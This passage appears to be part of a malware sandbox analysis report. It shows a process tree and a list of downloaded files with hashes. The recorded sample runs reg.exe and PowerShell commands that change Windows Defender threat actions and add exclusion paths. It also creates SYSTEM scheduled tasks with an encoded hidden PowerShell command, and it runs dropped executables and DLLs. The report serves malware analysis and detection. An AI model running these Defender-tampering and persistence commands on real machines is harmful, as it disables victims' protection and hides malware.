                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3960
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1164
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2512
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5008
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2784
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2380
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4668
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:2392
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1816
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1892
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFoKlzoQU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3168
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SEHcMRqOySkqPjodpTR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4384
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SEHcMRqOySkqPjodpTR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1664
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIsgkipqYqjkC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3304
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIsgkipqYqjkC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2232
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iQQhDFQnTDUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:616
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iQQhDFQnTDUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1300
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxVmDfoFnnvU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:8
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxVmDfoFnnvU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4648
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MMuRMqsaIxxaqhVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MMuRMqsaIxxaqhVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:964
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1060
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4232
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZuCHwPloRhxnZBJU /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2332
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZuCHwPloRhxnZBJU /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3924
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /CREATE /TN "gUXgXcezS" /SC once /ST 03:59:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:864
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /run /I /tn "gUXgXcezS"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:96
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "gUXgXcezS"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4676
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "NCFohduUlgzsvLtPH" /SC once /ST 04:32:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZuCHwPloRhxnZBJU\hLSrlDewNYVbAhL\xDAwZRH.exe\" Ym /site_id 757674 /S" /V1 /F
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:4428
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /run /I /tn "NCFohduUlgzsvLtPH"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4672
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:932
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4740
                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4476
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                      • C:\Windows\Temp\ZuCHwPloRhxnZBJU\hLSrlDewNYVbAhL\xDAwZRH.exe
                                                                                                                                                                                                                        C:\Windows\Temp\ZuCHwPloRhxnZBJU\hLSrlDewNYVbAhL\xDAwZRH.exe Ym /site_id 757674 /S
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        PID:4736
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "bQVIyCuucUjqxTYLAY"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1520
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4500
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1672
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3172
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4888
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RFoKlzoQU\joZUqQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xRzmvqrNLZCxpjs" /V1 /F
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:4684
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "xRzmvqrNLZCxpjs2" /F /xml "C:\Program Files (x86)\RFoKlzoQU\wblZjwE.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:4724
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /END /TN "xRzmvqrNLZCxpjs"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1144
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "xRzmvqrNLZCxpjs"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4596
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "YqkwsPLcwOcMRl" /F /xml "C:\Program Files (x86)\jxVmDfoFnnvU2\NBsZPPl.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:1472
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "WhAZkLdrcjuNd2" /F /xml "C:\ProgramData\MMuRMqsaIxxaqhVB\tqCkqEN.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:4876
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "gZYzeWKFNnfUJeihl2" /F /xml "C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\YqZRarh.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "bFKJkocbgypGFVdiaRF2" /F /xml "C:\Program Files (x86)\aIsgkipqYqjkC\HdAEADi.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:1528
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /CREATE /TN "dXlFeCIlfFsViObwD" /SC once /ST 13:30:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\SFHbSoDV\stICcOS.dll\",#1 /site_id 757674" /V1 /F
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                        PID:3444
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /run /I /tn "dXlFeCIlfFsViObwD"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:928
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:3964
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4764
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:2524
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:2508
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "NCFohduUlgzsvLtPH"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:1300
                                                                                                                                                                                                                                                • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZuCHwPloRhxnZBJU\SFHbSoDV\stICcOS.dll",#1 /site_id 757674
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2560
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZuCHwPloRhxnZBJU\SFHbSoDV\stICcOS.dll",#1 /site_id 757674
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:3804
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "dXlFeCIlfFsViObwD"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1404

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.1MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9d271a092a4064cb5614951b8f44d527

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      3ff2035bcadbef9c7ec9140bc1929abfbc1fae40

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0edd1ca0d8900dc765b08b1a4dd0d7bcb043ebe71ae7ff1a01193ea1a6b62f6d

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c30dbda16c2f06bd549aabc30de8265a8ab7d331078ad3dfd82afb5fe8d7e94b9438cdfe68e487c0198ebdccc1a602c3e34292ddf3ecbba8751b18b9f6bb96ec

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.1MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9d271a092a4064cb5614951b8f44d527

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      3ff2035bcadbef9c7ec9140bc1929abfbc1fae40

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0edd1ca0d8900dc765b08b1a4dd0d7bcb043ebe71ae7ff1a01193ea1a6b62f6d

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c30dbda16c2f06bd549aabc30de8265a8ab7d331078ad3dfd82afb5fe8d7e94b9438cdfe68e487c0198ebdccc1a602c3e34292ddf3ecbba8751b18b9f6bb96ec

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7a2de809dbfef24125ca9b29935b6719

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      98ac8fd8b2eef9401379cba1b0aae18135050689

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0152d68af35e8eed4bf2648de3dfe0965bf522829e3819229be160124b6cd836

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      04d5d9f916532c9c11552bfa1b010f237e87ef53279ead204bf91e706d8e28d5d95a6f8453aa9e927617138177a411f4bb54a1a318d0aa0437c1e7f3b7710eb8

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7a2de809dbfef24125ca9b29935b6719

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      98ac8fd8b2eef9401379cba1b0aae18135050689

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0152d68af35e8eed4bf2648de3dfe0965bf522829e3819229be160124b6cd836

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      04d5d9f916532c9c11552bfa1b010f237e87ef53279ead204bf91e706d8e28d5d95a6f8453aa9e927617138177a411f4bb54a1a318d0aa0437c1e7f3b7710eb8

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.0MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4d510a1b278797c107efd0e73d8ac838

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      00ab325238ac8944b1f5f98228dbdcabbdc650ba

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      235201d18b44523483e72c4c246355159bc269b9d420324d7f936dd737c866b2

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      26b435a842b8bde1804865af06ed5e7129ef169917f3ec76dd86d94b6ee668b09302e624d3817977aa229fb285efa8ef55bd8823a180f78cd41dc1332c740bd6

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.0MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4d510a1b278797c107efd0e73d8ac838

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      00ab325238ac8944b1f5f98228dbdcabbdc650ba

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      235201d18b44523483e72c4c246355159bc269b9d420324d7f936dd737c866b2

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      26b435a842b8bde1804865af06ed5e7129ef169917f3ec76dd86d94b6ee668b09302e624d3817977aa229fb285efa8ef55bd8823a180f78cd41dc1332c740bd6

